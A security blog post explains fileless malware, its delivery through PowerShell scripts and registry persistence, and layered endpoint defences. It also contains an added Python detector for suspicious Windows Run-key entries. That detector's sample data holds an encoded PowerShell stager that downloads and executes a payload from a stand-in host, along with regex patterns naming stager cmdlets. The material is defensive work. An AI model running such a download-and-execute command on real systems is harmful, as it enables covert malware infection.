Surviving Fileless Malware: What You Need to Know about Understanding Threat Diversification

Businesses and organizations that have adopted digitalization have not only become more agile, but they’ve also significantly optimized budgets while boosting competitiveness. Despite these advances in performance, the adoption of these new technologies has also increased the attack surface that cybercriminals can leverage to deploy threats and compromise the overall security posture of organizations.

The traditional threat landscape involved threats designed either to run covertly as independent applications on the victim’s machine or to compromise the integrity of existing applications and alter their behavior. Because such threats are commonly referred to as file-based malware, traditional endpoint protection solutions have incorporated technologies designed to scan files written to disk before they execute.

File-based vs. Fileless

Some of the most common attack techniques involve victims either downloading a malicious application whose purpose is to run silently in the background and track the user’s behavior, or triggering an exploit for a vulnerability in a commonly installed piece of software so that it can covertly download additional components and execute them without the victim’s knowledge.

Traditional threats must make it onto the victim’s disk before the malicious code executes. Signature-based detection exists specifically for this reason, as it can uniquely identify a file that’s known to be malicious and prevent it from being written or executed on the machine. However, new mechanisms such as encryption, obfuscation, and polymorphism have rendered traditional detection technologies obsolete, as cybercriminals can not only manipulate the way the file looks for each individual victim, but also make it difficult for security scanning engines to analyze the code within it.

Traditional file-based malware is usually designed to gain unauthorized access to the operating system and its binaries, normally creating or unpacking additional files and dependencies, such as .dll, .sys or .exe files, that serve different functions. It could also install itself as a driver or rootkit to take full control of the operating system, provided it could obtain a valid digital certificate to avoid triggering traditional file-based endpoint security technologies. One such piece of file-based malware was the highly advanced Stuxnet, designed to infiltrate a specific target while remaining persistent. It was digitally signed and had various modules that enabled it to spread covertly from one victim to another until it reached its intended target.

Fileless malware is completely different from file-based malware in terms of how the malicious code is executed and how it dodges traditional file-scanning technologies. As the term implies, fileless malware does not require any file to be written to disk in order to execute. The malicious code may be executed directly within the memory of the victim’s computer, meaning that it will not survive a system reboot. However, cybercriminals have adopted various techniques that combine fileless execution with persistence. For example, malicious code placed within registry entries and executed each time Windows boots allows for both stealth and persistence.

The use of scripts, shellcode and even encoded binaries is not uncommon for fileless malware leveraging registry entries, as traditional endpoint security mechanisms usually lack the ability to scrutinize scripts. Because traditional endpoint security scanning tools and technologies mostly focus on static file analysis between known and unknown malware samples, fileless attacks can go unnoticed for a very long time.

The main difference between file-based and fileless malware is where and how its components are stored and executed. The latter is becoming increasingly popular as cybercriminals have managed to dodge file-scanning technologies while maintaining persistence and stealth.

Delivery mechanisms

While both types of attacks rely on the same delivery mechanisms, such as infected email attachments or drive-by downloads exploiting vulnerabilities in browsers or commonly used software, fileless malware is usually script-based and can leverage existing legitimate applications to execute commands. For example, PowerShell scripts that are attached to booby-trapped Word documents can automatically be executed by PowerShell – a native Windows tool. The resulting commands could either send detailed information about the victim’s system to the attacker or download an obfuscated payload that the local traditional security solution can’t detect.

Other possible examples involve a malicious URL that, once clicked, redirects the user to a website that exploits a Java vulnerability to execute a PowerShell script. Because the script itself is just a series of legitimate commands that may download and run a binary directly within memory, traditional file-scanning endpoint security mechanisms will not detect the threat.
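The registry-resident persistence described above and the encoded PowerShell payloads described in this section leave a concrete trace that file scanners miss but a configuration check can catch: a Run-key value that launches a script host with an encoded command. The following Python is an added example, not code from the original article or from Bitdefender; it grades a constructed set of Run-key entries, decodes the UTF-16LE base64 behind `-EncodedCommand`, and flags download-and-execute tokens in the decoded text. The entries, the value names and the `example.invalid` URL are all constructed.

```python
import base64
import re

# Constructed HKCU\...\Run entries (value name, command line); not captured from a real host.
ENCODED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')"
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater", "powershell.exe -NoP -W Hidden -EncodedCommand "
                + base64.b64encode(ENCODED_SCRIPT.encode("utf-16le")).decode("ascii")),
    ("Helper", r'wscript.exe //B "C:\Users\alice\AppData\Roaming\update.vbs"'),
]

# Script hosts and other native binaries that rarely belong in a user's Run key.
SCRIPT_HOST = re.compile(r"(?i)\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b")
# Abbreviated and full forms of PowerShell's encoded-command switch, followed by base64.
ENCODED_FLAG = re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Cmdlets and .NET calls typical of in-memory download-and-execute stagers.
SUSPICIOUS_TOKENS = re.compile(
    r"(?i)\b(IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|"
    r"Net\.WebClient|FromBase64String|Reflection\.Assembly)\b")

def decode_encoded_command(cmd):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_run_value(name, cmd):
    """Grade one Run entry; findings run from the launcher to the decoded payload content."""
    findings = []
    if SCRIPT_HOST.search(cmd):
        findings.append("script-host-at-logon")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-command")
    text = cmd if decoded is None else cmd + " " + decoded  # scan the visible and hidden parts
    for tok in sorted({t.lower() for t in SUSPICIOUS_TOKENS.findall(text)}):
        findings.append("token:" + tok)
    return {"name": name, "decoded": decoded, "findings": findings}

def scan_run_values(values):
    """Return only the entries that produced at least one finding."""
    return [r for r in (assess_run_value(n, c) for n, c in values) if r["findings"]]

if __name__ == "__main__":
    for r in scan_run_values(SAMPLE_RUN_VALUES):
        print(r["name"], r["findings"])
```

On a live host the same functions can be fed the output of `reg query` or `Get-ItemProperty` over the HKCU and HKLM Run keys; the benign OneDrive entry produces no finding, the plain script-host entry one, and the encoded entry the full chain.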

These elusive threats are usually targeted at specific organizations and companies with the purpose of covert infiltration and data exfiltration.

Next-gen endpoint protection platforms

Next-gen endpoint protection platforms are usually security solutions that combine layered security – which is to say file-based scanning and behavior monitoring – with machine learning technologies and threat detection sandboxing. Some rely on machine learning algorithms alone as a single layer of defense, whereas other endpoint protection platforms use detection technologies that involve several security layers augmented by machine learning. In the latter case, the algorithms are focused on detecting advanced and sophisticated threats pre-execution, during execution, and post-execution.

A common mistake today is to treat machine learning as a standalone security layer capable of detecting any type of threat. Relying on an endpoint protection platform that uses only machine learning will not harden the overall security posture of an organization.

Machine learning algorithms are designed to augment security layers, not replace them. For example, spam filtering can be augmented through the use of machine learning models, and detection of file-based malware can also use machine learning to assess whether unknown files could be malicious.

Signature-less security layers are designed to offer protection, visibility, and control when it comes to preventing, detecting, and blocking any type of threat. Considering these new attack methods, it’s highly recommended that next-gen endpoint security platforms protect against attack tools and techniques that exploit unpatched known vulnerabilities – and of course, unknown vulnerabilities – in applications.

It’s important to note that traditional signature-based technologies are not dead and should not be discarded. They’re an important security layer, as they’re accurate and quick to validate whether a file is known to be malicious or not. Merging signature, behavioral, and machine learning security layers creates a security solution that’s not only able to deal with known malware but can also tackle unknown threats, which boosts the overall security posture of an organization. This comprehensive mix of security technologies is designed not only to increase the overall cost of attack for cybercriminals, but also to offer security teams deep insight into what types of threats are usually targeting their organization and how to mitigate them accurately.

About the author: Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the Web without protection or how to rodeo with wild Trojan horses.

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.